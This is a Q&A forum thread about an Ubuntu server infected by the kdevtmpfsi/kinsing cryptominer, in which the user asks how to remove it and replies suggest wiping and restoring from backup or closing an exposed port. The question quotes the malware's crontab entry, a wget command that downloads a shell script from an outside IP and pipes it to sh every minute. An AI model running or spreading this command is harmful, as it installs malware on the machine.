Ubuntu 22.04: Server infected by a malware kdevtmpfsi
My freshly created server was infected by the kdevtmpfsi malware. I saw many articles advising how to permanently remove this malware, but none of them worked for me. After trying something and "cleaning up" the system, the malware is back after a few hours and it consumes 100% of the CPU.
I read that the server, in most cases, gets infected through Redis/Docker. I do not use Redis.
In the server's /tmp directory, I have the file /tmp/kdevtmpfsi/. In some tutorials, I saw that I should run chmod 000 /tmp/kdevtmpfsi to kill access to that file - but even if I try to run that command as root, I get Operation not permitted.
If I run crontab -l, I see:
* * * * * wget -q -O - http://185.122.204.197/sc.sh | sh > /dev/null 2>&1

I obviously delete this line from crontab, but after a few minutes, it is back.
I also tried to run nmap to list open ports and got this:

On the second line from the bottom, there's shown kinsing - I am not sure how it got there. Should this be removed?
How do I remove kdevtmpfsi from the server in 2024?

@user535733 it doesn't, that thread was my starting point of doing research on how to fix it.

At this point the only sane thing to do is: 1) Find the last backup of your server which doesn't have this malware, 2) Wipe your server, doa fresh install and then restore the backup. Anything else is just playing whack-a-mole

It's been 4 days (knocking on the wood) and the virus didn't show up.
In my case, I had opened a port to public. After closing this port and routing the traffic through nginx, the virus seems to be gone.
